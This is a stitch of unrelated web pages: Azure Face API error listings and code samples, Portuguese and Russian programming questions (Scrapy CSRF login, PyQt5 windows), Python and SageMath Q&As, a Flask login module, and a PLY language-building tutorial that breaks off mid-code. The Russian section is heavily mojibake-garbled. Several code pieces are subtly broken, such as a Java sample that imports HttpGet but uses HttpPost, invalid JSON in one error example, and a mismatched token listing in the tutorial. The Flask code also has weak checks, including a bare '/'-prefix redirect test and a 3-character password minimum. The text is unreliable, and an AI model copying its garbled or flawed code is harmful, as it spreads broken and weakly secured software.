BadArgument Invalid argument targetFace. Caused by invalid string format or invalid left/top/height/width value.
BadArgument 'detectionModel' is invalid.
InvalidURL Invalid image URL.
InvalidURL Failed to download from target server. Remote server error returned.
InvalidImage There is more than 1 face in the image or in the specified targetFace area.
InvalidImage No face detected in the image or in the specified targetFace area.
InvalidImage Decoding error, image format unsupported.
InvalidImageSize Image size is too small.
InvalidImageSize Image size is too big.
{
"error": {
"code": "BadArgument",
"message": "JSON parsing error."
}
}
Response 401
Error code and message returned in JSON:
Error Code Error Message Description
Unspecified Invalid subscription Key or user/plan is blocked.
{
"error": {
"code": "Unspecified",
"message": "Access denied due to invalid subscription key. Make sure you are subscribed to an API you are trying to call and provide the right key."
}
}
Response 403
Persisted face number reached limit, maximum is 1000 per face list.
{
"error": {
"code": "QuotaExceeded",
"message": "Face number reached limit."
}
}
Response 404
Error code and message returned in JSON:
Error Code Error Message Description
FaceListNotFound Face list is not found.
FaceListNotFound Face list ID is invalid. Valid format should be a string composed by numbers, English letters in lower case, '-', '_', and no longer than 64 characters.
{
"error": {
"code": "FaceListNotFound",
"message": "Face list is not found."
}
}
Response 408
Operation exceeds maximum execution time.
{
"error": {
"code": "OperationTimeOut",
"message": "Request Timeout."
}
}
Response 409
{
"error": {
"code": ConcurrentOperationConflict,
"message": "There is a conflict operation on requested resource, please try later."
}
}
Response 415
Unsupported media type error. Content-Type is not in the allowed types:
For an image URL, Content-Type should be application/json.
For a local image, Content-Type should be application/octet-stream.
{
"error": {
"code": "BadArgument",
"message": "Invalid Media Type."
}
}
Response 429
{
"error": {
"statusCode": 429,
"message": "Rate limit is exceeded. Try again in 26 seconds."
}
}
Code samples
@ECHO OFF
curl -v -X POST "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces?userData={string}&targetFace={string}&detectionModel=detection_01"
-H "Content-Type: application/json"
-H "Ocp-Apim-Subscription-Key: {subscription key}"
--data-ascii "{body}"
using System;
using System.Net.Http.Headers;
using System.Text;
using System.Net.Http;
using System.Web;
namespace CSHttpClientSample
{
static class Program
{
static void Main()
{
MakeRequest();
Console.WriteLine("Hit ENTER to exit...");
Console.ReadLine();
}
static async void MakeRequest()
{
var client = new HttpClient();
var queryString = HttpUtility.ParseQueryString(string.Empty);
// Request headers
client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request parameters
queryString["userData"] = "{string}";
queryString["targetFace"] = "{string}";
queryString["detectionModel"] = "detection_01";
var uri = "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces?" + queryString;
HttpResponseMessage response;
// Request body
byte[] byteData = Encoding.UTF8.GetBytes("{body}");
using (var content = new ByteArrayContent(byteData))
{
content.Headers.ContentType = new MediaTypeHeaderValue("< your content type, i.e. application/json >");
response = await client.PostAsync(uri, content);
}
}
}
}
// // This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
import java.net.URI;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
public class JavaSample
{
public static void main(String[] args)
{
HttpClient httpclient = HttpClients.createDefault();
try
{
URIBuilder builder = new URIBuilder("https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces");
builder.setParameter("userData", "{string}");
builder.setParameter("targetFace", "{string}");
builder.setParameter("detectionModel", "detection_01");
URI uri = builder.build();
HttpPost request = new HttpPost(uri);
request.setHeader("Content-Type", "application/json");
request.setHeader("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request body
StringEntity reqEntity = new StringEntity("{body}");
request.setEntity(reqEntity);
HttpResponse response = httpclient.execute(request);
HttpEntity entity = response.getEntity();
if (entity != null)
{
System.out.println(EntityUtils.toString(entity));
}
}
catch (Exception e)
{
System.out.println(e.getMessage());
}
}
}
<!DOCTYPE html>
<html>
<head>
<title>JSSample</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$(function() {
var params = {
// Request parameters
"userData": "{string}",
"targetFace": "{string}",
"detectionModel": "detection_01",
};
$.ajax({
url: "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces?" + $.param(params),
beforeSend: function(xhrObj){
// Request headers
xhrObj.setRequestHeader("Content-Type","application/json");
xhrObj.setRequestHeader("Ocp-Apim-Subscription-Key","{subscription key}");
},
type: "POST",
// Request body
data: "{body}",
})
.done(function(data) {
alert("success");
})
.fail(function() {
alert("error");
});
});
</script>
</body>
</html>
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[])
{
NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
NSString* path = @"https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces";
NSArray* array = @[
// Request parameters
@"entities=true",
@"userData={string}",
@"targetFace={string}",
@"detectionModel=detection_01",
];
NSString* string = [array componentsJoinedByString:@"&"];
path = [path stringByAppendingFormat:@"?%@", string];
NSLog(@"%@", path);
NSMutableURLRequest* _request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:path]];
[_request setHTTPMethod:@"POST"];
// Request headers
[_request setValue:@"application/json" forHTTPHeaderField:@"Content-Type"];
[_request setValue:@"{subscription key}" forHTTPHeaderField:@"Ocp-Apim-Subscription-Key"];
// Request body
[_request setHTTPBody:[@"{body}" dataUsingEncoding:NSUTF8StringEncoding]];
NSURLResponse *response = nil;
NSError *error = nil;
NSData* _connectionData = [NSURLConnection sendSynchronousRequest:_request returningResponse:&response error:&error];
if (nil != error)
{
NSLog(@"Error: %@", error);
}
else
{
NSError* error = nil;
NSMutableDictionary* json = nil;
NSString* dataString = [[NSString alloc] initWithData:_connectionData encoding:NSUTF8StringEncoding];
NSLog(@"%@", dataString);
if (nil != _connectionData)
{
json = [NSJSONSerialization JSONObjectWithData:_connectionData options:NSJSONReadingMutableContainers error:&error];
}
if (error || !json)
{
NSLog(@"Could not parse loaded json with error:%@", error);
}
NSLog(@"%@", json);
_connectionData = nil;
}
[pool drain];
return 0;
}
<?php
// This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
require_once 'HTTP/Request2.php';
$request = new Http_Request2('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces');
$url = $request->getUrl();
$headers = array(
// Request headers
'Content-Type' => 'application/json',
'Ocp-Apim-Subscription-Key' => '{subscription key}',
);
$request->setHeader($headers);
$parameters = array(
// Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01',
);
$url->setQueryVariables($parameters);
$request->setMethod(HTTP_Request2::METHOD_POST);
// Request body
$request->setBody("{body}");
try
{
$response = $request->send();
echo $response->getBody();
}
catch (HttpException $ex)
{
echo $ex;
}
?>
########### Python 2.7 #############
import httplib, urllib, base64
headers = {
# Request headers
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.urlencode({
# Request parameters
'userData': '{string}',
'targetFace': '{string}',
'detectionModel': 'detection_01',
})
try:
conn = httplib.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
conn.request("POST", "/face/v1.0/facelists/{faceListId}/persistedFaces?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
########### Python 3.2 #############
import http.client, urllib.request, urllib.parse, urllib.error, base64
headers = {
# Request headers
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.parse.urlencode({
# Request parameters
'userData': '{string}',
'targetFace': '{string}',
'detectionModel': 'detection_01',
})
try:
conn = http.client.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
conn.request("POST", "/face/v1.0/facelists/{faceListId}/persistedFaces?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
require 'net/http'
uri = URI('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces')
uri.query = URI.encode_www_form({
# Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01'
})
request = Net::HTTP::Post.new(uri.request_uri)
# Request headers
request['Content-Type'] = 'application/json'
# Request headers
request['Ocp-Apim-Subscription-Key'] = '{subscription key}'
# Request body
request.body = "{body}"
response = Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request(request)
end
puts response.body
|
Estou tendo alguns problemas em usar o scrapy autenticando em minha aplicação. Estou usando o requests para obter o csrftoken e logo em seguida faço um request para a rota de login passando as informações. Por algum motivo está retornando esta mensagem:
Forbidden (CSRF cookie not set.): /login/
HTTP POST /login/ 403 [0.01, 127.0.0.1:58148]
Meu código:
class TestSpider(InitSpider):
name = 'spider'
allowed_domains = ['localhost:8000']
login_page = 'http://localhost:8000/login/'
start_urls = ['http://localhost:8000/']
user_agent = 'Spider 2.0'
rules = (
Rule(LinkExtractor(), callback='parse_item', follow=True),
)
def init_request(self):
rsp = requests.get(self.start_urls[0], headers={'User-Agent': USER_AGENT })
csrftoken = None
if 'csrftoken' in rsp.cookies:
csrftoken = rsp.cookies['csrftoken']
else:
csrftoken = rsp.cookies['csrf']
print(csrftoken) # Está aparecendo o csrtoken, ok.
my_data = {'username': 'xxxx', 'password': 'xxxxx', 'csrfmiddlewaretoken': csrftoken}
return Request(url=self.login_page, method='POST', cookies={'sessionid':rsp.cookies.get('sessionid')}, body=json.dumps(my_data), headers={'Content-Type':'application/json', 'User-Agent': USER_AGENT}, callback=self.login)
def login(self, response):
if "OLÃ" in response.text:
print("LOGADO!")
return self.initialized()
else:
print("Problema com login")
|
This question already has an answer here:
Remove all the elements that occur in one list from another 5 answers
I have list1 and list2. list2 is a group of words that have to be removed from list1, for example:
list1=['paste', 'text', 'text', 'here', 'here', 'here', 'my', 'i', 'i', 'me', 'me']list2=["i","me"]
Desired output:
list3=['paste', 'text', 'text', 'here', 'here', 'here', 'my']
I have tried different versions using 'for' but no results so far.
Any ideas would be appreciated!
Use list comprehension:
>>> list1 = ['paste', 'text', 'text', 'here', 'here', 'here', 'my', 'i', 'i', 'me', 'me']
>>> list2 = ["i","me"]
>>> list3 = [item for item in list1 if item not in list2]
>>> list3
['paste', 'text', 'text', 'here', 'here', 'here', 'my']
NOTE: Lookups in lists are O(n), consider making a set from list2 instead - lookups in sets are O(1).
|
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
"""Endpoints for user login and out."""
from flask import Blueprint, request, redirect, url_for, session, flash
import re
import rophako.model.user as User
from rophako.utils import template
mod = Blueprint("account", __name__, url_prefix="/account")
@mod.route("/")
def index():
return redirect(url_for(".login"))
@mod.route("/login", methods=["GET", "POST"])
def login():
"""Log into an account."""
if request.method == "POST":
username = request.form.get("username", "")
password = request.form.get("password", "")
# Lowercase the username.
username = username.lower()
if User.check_auth(username, password):
# OK!
db = User.get_user(username=username)
session["login"] = True
session["username"] = username
session["uid"] = db["uid"]
session["name"] = db["name"]
session["role"] = db["role"]
# Redirect them to a local page?
url = request.form.get("url", "")
if url.startswith("/"):
return redirect(url)
return redirect(url_for("index"))
else:
flash("Authentication failed.")
return redirect(url_for(".login"))
return template("account/login.html")
@mod.route("/logout")
def logout():
"""Log out the user."""
session["login"] = False
session["username"] = "guest"
session["uid"] = 0
session["name"] = "Guest"
session["role"] = "user"
flash("You have been signed out.")
return redirect(url_for(".login"))
@mod.route("/setup", methods=["GET", "POST"])
def setup():
"""Initial setup to create the Admin user account."""
# This can't be done if users already exist on the CMS!
if User.exists(uid=1):
flash("This website has already been configured (users already created).")
return redirect(url_for("index"))
if request.method == "POST":
# Submitting the form.
username = request.form.get("username", "")
name = request.form.get("name", "")
pw1 = request.form.get("password1", "")
pw2 = request.form.get("password2", "")
# Default name = username.
if name == "":
name = username
# Lowercase the user.
username = username.lower()
if User.exists(username=username):
flash("That username already exists.")
return redirect(url_for(".setup"))
# Validate the form.
errors = validate_create_form(username, pw1, pw2)
if errors:
for error in errors:
flash(error)
return redirect(url_for(".setup"))
# Create the account.
uid = User.create(
username=username,
password=pw1,
name=name,
role="admin",
)
flash("Admin user created! Please log in now.".format(uid))
return redirect(url_for(".login"))
return template("account/setup.html")
def validate_create_form(username, pw1=None, pw2=None, skip_passwd=False):
"""Validate the submission of a create-user form.
Returns a list of error messages if there were errors, otherwise
it returns None."""
errors = list()
if len(username) == 0:
errors.append("You must provide a username.")
if re.search(r'[^A-Za-z0-9-_]', username):
errors.append("Usernames can only contain letters, numbers, dashes or underscores.")
if not skip_passwd:
if len(pw1) < 3:
errors.append("You should use at least 3 characters in your password.")
if pw1 != pw2:
errors.append("Your passwords don't match.")
if len(errors):
return errors
else:
return None
|
ÐабÑоÑал неболÑÑÑÑ Ð¿ÑогÑ, на оÑнове ÑÑебника. ÐÑиложение, коÑоÑое бÑÐ´ÐµÑ ÑпÑавлÑÑÑ Ð±Ð´.
ÐопÑÐ¾Ñ 1ÐоÑÐµÐ¼Ñ Ð² ÑÑнкÑиÑ(open или openZvuk) нам нÑжно пеÑедаваÑÑ self, Ð²ÐµÐ´Ñ Ð¿Ð¾ ÑÑÑи Ñ Ð¿ÑоÑÑо ÑÐ¾Ð·Ð´Ð°Ñ Ð¾Ð±ÑÐµÐºÑ Ð´ÑÑгого клаÑÑа
ÐопÑÐ¾Ñ 2ÐоÑле нажаÑÐ¸Ñ Ð½Ð° кнопкÑ, коÑоÑÐ°Ñ Ð¾ÑкÑÑÐ²Ð°ÐµÑ ÑÑеÑÑе окно ( class WindowZvuk) пÑоÑÑо мгновенно закÑÑваеÑÑÑ Ð¸ конÑÐ¾Ð»Ñ Ð¿Ð¸ÑÐµÑ ÑеÑÑаÑÑ Ð¸ ниÑего не пÑоиÑÑ
одиÑ. ÐÑобовал оÑладиÑÑ ÑÑÐ¾Ñ ÑÑÐ°Ð³Ð¼ÐµÐ½Ñ Ð¿ÑоÑÑо, без ÑÐ¾Ð·Ð´Ð°Ð½Ð¸Ñ ÐºÐ»Ð°ÑÑа, вÑÑ Ð¾ÑлиÑно ÑабоÑаеÑ. Ðз ÑÑого ÑÑÐ¾Ð¸Ñ Ð²Ñвод, ÑÑо Ñ Ð½Ð°ÐºÐ¾ÑÑÑил в Ñоздании клаÑÑа или ÑÑм-Ñо подобном, но Ñам ÑазобÑаÑÑÑÑ Ð½Ðµ могÑ.
Ðа кÑиÑÐ¸ÐºÑ Ð¸ подÑказки бÑÐ´Ñ Ð±Ð»Ð°Ð³Ð¾Ð´Ð°Ñен, ÑолÑко наÑал изÑÑаÑÑ
from PyQt5 import QtWidgets, QtSql, QtCore
import sys
app = QtWidgets.QApplication(sys.argv)
class Windows(QtWidgets.QWidget):# клаÑÑ Ð¾ÐºÐ½Ð° "Ð¡Ñ‚ÑƒÐ´Ð¸Ñ Ð·Ð²ÑƒÐºÐ¾Ð·Ð°Ð¿Ð¸Ñи"
def __init__(self, parent = None):#parent = None for works
QtWidgets.QWidget.__init__(self, parent)# for works
btn1 = QtWidgets.QPushButton("ПроÑмотреть таблицы")
self.resize(400, 300)
self.setWindowTitle("Ð¡Ñ‚ÑƒÐ´Ð¸Ñ Ð·Ð²ÑƒÐºÐ¾Ð·Ð°Ð¿Ð¸Ñи")
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(btn1)
self.setLayout(vbox)
btn1.clicked.connect(self.open)
def open(self):
self.Twowin = Window2()
self.Twowin.show()
self.hide()
class Window2(QtWidgets.QWidget):# клаÑÑ Ð¾ÐºÐ½Ð° "Выбор таблиц"
def __init__(self, parent = None):#parent = None for works
QtWidgets.QWidget.__init__(self, parent)# for works
self.resize(400, 300)
self.setWindowTitle("Выбор таблиц")
btnTableZvuk = QtWidgets.QPushButton("Таблица ЗвукорежиÑÑёров")
vbox2 = QtWidgets.QVBoxLayout()
vbox2.addWidget(btnTableZvuk)
self.setLayout(vbox2)
btnTableZvuk.clicked.connect(self.openZvuk)
def openZvuk(self):
self.WindowZv = WindowZvuk()# вот тут проверить, как рабоатет self.
self.WindowZv.show()#
class WindowZvuk(QtWidgets.QWidget):# клаÑÑ Ð¾ÐºÐ½Ð° "Выбор таблиц"
def __init__(self, parent = None):#parent = None for works
QtWidgets.QWidget.__init__(self, parent)# for works
self.resize(1000, 1000)
con = QtSql.QSqlDatabase.addDatabase('QSQLITE')
con.setDatabaseName('путь')#здеÑÑŒ Ñпециально нет пути, в оригинале
он еÑть
con.open()
stm = QtSql.QSqlTableModel(parent = WindowZv)
stm.setTable('ZvukRez')
stm.setSort(1, QtCore.Qt.AscendingOrder)
stm.select()
stm.setHeaderData(1, QtCore.Qt.Horizontal, 'Столбец 1')
stm.setHeaderData(2, QtCore.Qt.Horizontal, 'Столбец 2')
stm.setHeaderData(3, QtCore.Qt.Horizontal, 'Столбец 3j')
stm.setHeaderData(4, QtCore.Qt.Horizontal, 'Столбец 4')
stm.setHeaderData(5, QtCore.Qt.Horizontal, 'Столбец 5')
vbox3 = QtWidgets.QVBoxLayout()
tv = QtWidgets.QTableView()
tv.setmodel(stm)
tv.hideColumn(0)
tv.setColumnWidth(1, 150)
tv.setColumnWidth(2, 150)
tv.setColumnWidth(3, 150)
tv.setColumnWidth(4, 150)
tv.setColumnWidth(5, 150)
vbox3.addWidget(tv)
self.setLayout(self.vbox3)
# def addRecord():
# stm.insertRow(stm.rowCount())
#def delRecord():
# stm.removeRow(tv.currentIndex().row())
# stm.select()
MainWindow = Windows()
MainWindow.show()
|
How to correctly plot x^(1/3)
sage: plot(x**(1/3))
This command produces a graph that looks like this:
I was expecting a graph like this:
SageMath sometimes chooses complex cube roots, which explains this behavior.
There's not much you can do about this internal choice. But you can do this:
plot(sgn(x)*abs(x)^(1/3),(x,-13,13))
Another way is to use the method x.nth_root(3) for real numbers x.
Using this
sage: plot(lambda x: RR(x).nth_root(3), (-1, 1))
gives the desired plot.
[Edited after the question was updated, clarifying it is not "why does the graph not start at zero", but "why is the negative part missing".]
Together with the unsatisfactory plot, the command
sage: plot(x^(1/3))
gives some warnings:
verbose 0 (3797: plot.py, generate_plot_points)
WARNING: When plotting, failed to evaluate function at 100 points.
verbose 0 (3797: plot.py, generate_plot_points)
Last error message: 'can't convert complex to float'
They give a clue as to what goes wrong.
By default, plot plots on the interval $[-1, 1]$ using200 points regularly spaced along that interval to evaluatethe function being plotted.
The warning that it "failed to evaluate function at 100 points", and the plot it produces, reveal that it failed to get a point to plot for all the negative values.
Here is how Sage computes powers one-third of negative numbers, depending on whether they are rational or floating-point:
sage: a = (-1)^(1/3)
sage: a
(-1)^(1/3)
sage: b = (-1.)^(1/3)
sage: b
0.500000000000000 + 0.866025403784439*I
And here is what happens when trying to convert them to floats(plot does that):
sage: float(a)
---------------------------------------------------------------------------
Traceback (most recent call last)
...
TypeError: can't convert complex to float
During handling of the above exception, another exception occurred:
TypeError: unable to simplify to float approximation
sage: float(b)
Traceback (most recent call last)
...
TypeError: unable to convert 0.500000000000000 + 0.866025403784439*I
to float; use abs() or real_part() as desired
To plot the real-cube-root function, i.e. the composition inverse of the $(x \mapsto x^3)$ bijection, there are various options.
One is indicated in @rburing's answer, and uses the sign and the absolute value to work around this limitation in Sage. It is actually part of the SageMath FAQ, see:
One other option is to plot $x = y^3$ instead of $y = x^(1/3)$.
This can be done using a parametric plot:
sage: parametric_plot((lambda t: t^3, lambda t: t), (-1, 1))
This can also be done using an implicit plot since the desired graph is the locus where $x - y^3$ is zero:
sage: implicit_plot(lambda x, y: x - y^3, (-1, 1), (-1, 1))
By default implicit plot comes with a frame instead of axes.
One can add axes:
sage: implicit_plot(lambda x, y: x - y^3, (-1, 1), (-1, 1), axes=True)
One can additionally remove the frame:
sage: implicit_plot(lambda x, y: x - y^3, (-1, 1), (-1, 1), axes=True, frame=False)
Asked: 2020-04-25 06:53:08 -0600
Seen: 225 times
Last updated: Apr 27 '20
|
Making your own programming language with Python
Making your own programming language with Python
Why make your own language?
When you write your own programming language, you control the entire programmer experience.
This allows you to shape exact how each aspect of your language works and how a developer interacts with it.
This allows you to make a language with things you like from other languages and none of the stuff you don't.
In addition, learning about programming language internals can help you better understand the internals of programming languages you use every day, which can make you a better programmer.
How programming languages work
Every programming language is different in the way it runs, but many consist of a couple fundamental steps: lexing and parsing.
Introduction to Lexing
Lexing is short for LEXical analysis.
The lex step is where the language takes the raw code you've written and converts it into an easily parsable structure.
This step interprets the syntax of your language and turns next into special symbols inside the language called tokens.
For example, let's say you have some code you want to parse. To keep it simple I'll use python-like syntax, but could be anything. It doesn't even have to be text.
# this is a commenta = (1 + 1)
A lexer to parse this code might do the following:
Discard all comments
Produce a token that represents a variable name
Produce left and right parenthesis tokens
Convert literals like numbers or strings to tokens
Produce tokens for nath operations like + - * /(and maybe bitwise/logical operators as well)
The lexer will take the raw code and interpret it into a list of tokens.
The lexer can also be used to insure that two pieces of code that may be different, like 1 + 1 and 1+1 are still parsed the same way.
For the code above, it might generate tokens like this:
NAME(a) EQUALS LPAREN NUMBER(1) PLUS NUMBER(2) RPAREN
Tokens can be in many forms, but the main idea here is that they are a standard and easy to parse way of representing the code.
Introduction to Parsing
The parser is the next step in the running of your language.
Now that the lexer has turned the text into consistent tokens, the parser simplifies and executes them.
Parser rules recognize a sequence of tokens and do something about them.
Let's look at a simple example for a parser with the same tokens as above.
A simple parser could just say:
If I see the GREETtoken and then aNAMEtoken, printHello,and the the name.
A more complicated parser aiming to parse the code above might have these rules, which we will explore later:
Try to classify as much code as possible as an expression. By "as much code as possible" I mean the parser will first try to consider a full mathematical operation as an expression, and then if that fails convert a single variable or number to an expression. This ensure that as much code as possible will be matched as an expression. The "expression" concept allows us to catch many patterns of tokens with one piece of code. We will use the expression in the next step.
Now that we have a concept of an expression, we can tell the parser that if it sees the tokens NAME EQUALSand then an expression, that means a variable is being assigned.
Using PLY to write your language
What is PLY?
Now that we know the basics of lexing and parsing, lets start writing some python code to do it.
PLY stands for Python Lex Yacc.
It is a library you can use to make your own programming language with python.
Lex is a well known library for writing lexers.
Yacc stands for "Yet Another Compiler Compiler" which means it compiles new languages, which are compilers themself.
This tutorial is a short example, but the PLY documentation is an amazing resource with tons of examples. I would highly recommend that you check it out if you are using PLY.
For this example, we are going to be building a simple calculator with variables. If you want to see the fully completed example, you can fork this repl: [TODO!!]
Lexing with PLY lex
Lexer tokens
Lets start our example! Fire up a new python repl and follow along with the code samples.
To start off, we need to import PLY:
from ply import lex, yacc
Now let's define our first token. PLY requires you to have a tokens list which contains every token the lexer can produce. Let's define our first token, PLUS for the plus sign:
tokens = [
'PLUS',
]
t_PLUS = r'\+'
A string that looks like r'' is special in python. The r prefix means "raw" which includes backslashes in the string. For example, to make define the string \+ in python, you could either do '\\+' or r'\+'. We are going to be using a lot of backslashes, so raw strings make things a lot easier.
But what does \+ mean?
Well in the lexer, tokens are mainly parsed using regexes.
A regex is like a special programming language specifically for matching patterns in text.
A great resource for regexes is regex101.com where you can test your regexes with syntax highlighting and see explanations of each part.
I'm going to explain the regexes included in this tutorial, but if you want to learn more you can play around with regex101 or read one of the many good regex tutorials on the internet.
The regex \+ means "match a single character +".
We have to put a backshlash before it because + normally has a special meaning in regex so we have to "escape" it to show we want to match a + literally.
We are also required to define a function that runs when the lexer encounters an error:
def t_error(t):
print(f"Illegal character {t.value[0]!r}")
t.lexer.skip(1)
This function just prints out a warning when it hits a character it doesn't recognize and then skips it (the !r means repr so it will print out quotes around the character).
You can change this to be whatever you want in your language though.
Optionally, you can define a newline token which isn't produced in the output of the lexer, but keeps track of each line.
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
Since this token is a function, we can define the regex in docstring of the function instead.
The function takes a paramater t, which is a special object representing the match that the lexer found. We can access the lexer using the the t.lexer attribute.
This function matches at least one newline character and then increases the line number by the amount that it sees. This allows the lexer to known what line number its on at all times using the lexer.lineno variable.
Now we can use the line number in our error function:
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
Let's test out the lexer!
This is just some temporary code, you don't have to know what this code does, because once we implement a parser, the parser will run the lexer for you.
lexer = lex.lex()
lexer.input('+')
for token in lexer:
print(token)
Play around with the value passed to lex.input.
You should notice that any character other than a plus sign makes the error message print out, but doesn't crash the program.
In your language, you can make it gracefully ignore lex errors like this or make it stop running by editing the t_error function.
If you add more lines to the input string, the line number in the error message should change.
More complicated tokens
Let's delete the test token add some more complicated tokens.
Replace your tokens list and the t_PLUS line with the following code:
reserved_tokens = {
'greet': 'GREET'
}
tokens = list(reserved_tokens.values()) + [
'SPACE'
]
t_SPACE = r'[ ]'
def t_ID(t):
r'[a-zA-Z_][a-zA-Z0-9_]*'
if t.value in reserved_tokens:
t.type = reserved_tokens[t.value]
else:
t.type = 'NAME'
return t
Let's explore the regex we have in the t_ID function.
This regex is more complicated that the simple ones we've used before.
First, we have [a-zA-Z_]. This is a character class in regex. It means, match any lowercase letter, uppercase letter, or underscore.
Next we have [a-zA-Z0-9_]. This is the same as above except numbers are also included.
Finally, we have *. This means "repeat the previous group or class zero to unlimited times".
Why do we structure the regex like this?
Having two separate classes makes sure that the first one must match for it to be a valid variable.
If we exclude numbers from the first class, it not only doesn't match just regular numbers, but makes sure you can't start a variable with a number.
You can still have numbers in the variable name, because they are matched by the second class of the regex.
In the code, we first have a dictionary of reserved names.
This is a mapping of patterns to the token type that they should be.
The only one we have says that greet should be mapped to the GREET token.
The code that sets up the tokens list takes all of the possible reserved token values, in this is example its just ['GREET'] and adds on ['SPACE'], giving us ['GREET', 'SPACE'] automatically!
But why do we have to do this? Couldn't we just use something like the following code?
# Don't use this code! It doesn't work!
t_GREET = r'greet'
t_SPACE = r'[ ]'
t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
Actually, if we used that code, greet would never be matched! The lexer would match it with the NAME token. In order to avoid this, we define a new type of token which is a function. This function has the regex as its docstring and is passed a t paramater. This paramater has a value attribute which is the pattern matched.
The code inside this function simply checks if this value is one of the special reserved names we defined before. If it is, we set the special type attribute of the t paramter. This type controls the type of token which is produced from the pattern. When it sees the name greet, it will see greet is in the reserved names dictionary and produce a token type of GREET because that is the corresponding value in the dictionary. Otherwise, it will produce a NAME token because this is a regular variable.
This allows you to add more reserved terms easily later, its as simple as adding a value to the dictionary.
If needed, you could make also make the key of the reserved names dicitonary a regex and the match each regex against t.value in the function.
If you want to change these rules for your language, feel free!
Parsing with PLY yacc
Fair warning: Yacc can sometimes be hard to use and debug, every if you know python well.
Keep in mind, you don't have to use both lex and yacc, if you want you can just use lex and then write your own code to parse the tokens.
With that said lets get started.
Yacc basics
Before we get started, delete the lexer testing code (everything from lexer.input onward).
When we run the parser, the lexer is automatially run.
Let's add our first parser rule!
def p_hello(t):
'statement : GREET SPACE NAME'
print(list(t))
print(f"Hello, {t[3]}")
Let's break this down.
Again, we have information on the rule in the docstring.
This information is called a BNF Grammar. A statement in BNF Grammar consists of a grammar rule known as a non-terminal and terminals.
In the example above, statement is the non-terminal and GREET SPACE NAME are terminals.
The left-hand side describes what is produced by the rule, and the right-hand side describes what matches the rule.
The right hand side can also have non-terminals in it, just be careful to avoid infinite loops.
Basically, the yacc parser works by pushing tokens onto a stack, and looking at the current stack and the next token and seeing if they match any rules that it can use to simplify them. Here is a more in-depth explanation and example.
Before the above example can run, we still have to add some more code.
Just like for the lexer, the error handler is required:
def p_error(t):
if t is None: # lexer error, already handled
return
print(f"Syntax Error: {t.value!r}")
Now let's create and run the parser:
parser = yacc.yacc()
parser.parse('greet replit')
If you run this code you should see:
[None, 'greet', ' ', 'replit']
Hello, replit
The first line is the list version of the object passed to the parser function.
The first value is the statement that will be produced from the function, so it is None.
Next, we have the values of the tokens we specified in the rule.
This is where the t[3] part comes from. This is the third item in the array, which is the NAME token, so our parser prints out Hello, replit!
Note: Creating the parser tables is a relatively expensive operation, so the parser creates a file called
parsetab.pywhich it can load the parse tables from if they haven't changed.
You can change this filename by passing a kwarg into theyaccinitialization, likeparser = yacc.yacc(tabmodule='fooparsetab')
More complicated parsing: Calculator
This example is different from our running example, so I will just show a full code example and explain it.
from ply import lex, yacc
tokens = (
'NUMBER',
'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
'LPAREN', 'RPAREN',
)
t_PLUS = r'\+'
t_MINUS = r'-'
t_TIMES = r'\*'
t_DIVIDE = r'/'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print(f"Integer value too large: {t.value}")
t.value = 0
return t
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
t_ignore = ' \t'
lexer = lex.lex()
# Parsing
def p_expression_binop(t):
'''expression : expression PLUS expression
| expression MINUS expression
| expression TIMES expression
| expression DIVIDE expression'''
if t[2] == '+' : t[0] = t[1] + t[3]
elif t[2] == '-': t[0] = t[1] - t[3]
elif t[2] == '*': t[0] = t[1] * t[3]
elif t[2] == '/': t[0] = t[1] / t[3]
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_expression_number(t):
'expression : NUMBER'
t[0] = t[1]
def p_error(t):
if t is None: # lexer error
return
